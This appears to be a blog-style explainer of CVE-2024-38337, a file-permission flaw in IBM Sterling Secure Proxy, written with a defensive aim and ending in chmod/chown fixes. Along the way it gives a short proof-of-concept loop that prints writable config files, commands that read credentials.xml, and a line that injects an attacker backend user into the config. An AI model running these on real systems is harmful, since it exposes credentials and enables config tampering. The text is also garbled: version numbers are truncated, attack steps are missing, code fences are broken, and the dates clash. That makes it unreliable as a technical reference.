On June 11, 2024, a new security vulnerability—CVE-2024-38337—was announced for IBM Sterling Secure Proxy, a critical tool used by companies to protect and manage their file transfers. Versions 6... through 6.2.. are affected by this flaw, which allows unauthorized users to view or modify sensitive information due to poorly set permissions. If your organization relies on Sterling Secure Proxy to guard its data, this is something you need to pay close attention to.
6.2..
Any deployment running these versions is potentially at risk.
What Is the Problem?
At its core, CVE-2024-38337 is about *incorrect permission assignments*. These permissions normally decide who can read, write, or change configuration or data files. In the affected releases, these permissions are too broad, causing two main risks:
Unauthorized Data Access: Attackers may read sensitive info.
2. Unauthorized Data Change: Attackers may *alter* configuration files, adding persistent backdoors or disrupting business workflows.
Getting Technical: Where’s The Gap?
In IBM Sterling Secure Proxy, vital files like configuration, logs, or credentials should be tightly access-controlled. Due to file permissions being set too widely (such as using rw-rw-rw- or giving access to "Everyone" or group accounts unnecessarily), attackers who gain limited user access can escalate easily.
Instead of being locked to the ssp service user, it is installed like this
# BAD PERMISSIONS (everyone can read and write)
-rw-rw-rw- 1 ssp ssp 248 Jun 9 10:21 credentials.xml
Any user on the system, even unprivileged ones, can open the file
cat /opt/ibm/ssp/proxy-server/config/credentials.xml
Or worse, an attacker could edit the XML file to change the proxy’s behavior
echo '<backendUser>attacker</backendUser>' >> /opt/ibm/ssp/proxy-server/config/credentials.xml
Let’s walk through a possible, but realistic, attack timeline
1. Getting Local Access: The attacker gains shell access (via phishing, supplier mishap, or abused web app).
`bash
find /opt/ibm/ssp/ -type f -perm -002
prod-admin
TopSecret2024
`
4. Changing Application Behavior: By modifying config entries, attackers might redirect traffic, disable logging, or grant themselves special privileges.
5. Persistence: The attacker leaves a backdoor user in the proxy config, surviving reboots and patching.
Key Point: The attacker doesn’t need to be an admin—just any account with system access.
Here’s a *minimal* proof-of-concept that finds and prints unsecured sensitive files
for file in /opt/ibm/ssp/proxy-server/config/*; do
if [ -w "$file" ] && [ -r "$file" ]; then
echo "[+] Vulnerable file found: $file"
cat "$file"
fi
done
Or, you could *add* a line to a config file, if writable
echo "<test>owned</test>" >> /opt/ibm/ssp/proxy-server/config/server.xml
How Bad Is This?
IBM officially rates this as “high” impact. Why? Because *any* sensitive file could be seen or changed by all system users—even in strong network perimeters, a single compromised user can jeopardize the entire secure file transfer operation.
`bash
# Only owner can read/write
chmod 600 /opt/ibm/ssp/proxy-server/config/*.xml
chown ssp:ssp /opt/ibm/ssp/proxy-server/config/*.xml
Repeat for all sensitive files.
Upgrade:
IBM provides patches and newer releases that fix the default permissions. Upgrade to the latest Sterling Secure Proxy release.
Monitor:
Check for unexpected file changes using tools like auditd or tripwire.
CVE Details:
IBM Security Bulletin:
IBM Sterling Secure Proxy Vulnerability
IBM Sterling Secure Proxy Product Page:
Conclusion
CVE-2024-38337 is a wake-up call for every company running IBM Sterling Secure Proxy. Incorrect file and folder permissions can tear down even the best-designed security boundaries. Check your systems, update to the latest version, and always verify permission settings manually after every update or deployment.
Timeline
Published on: 01/19/2025 15:15:19 UTC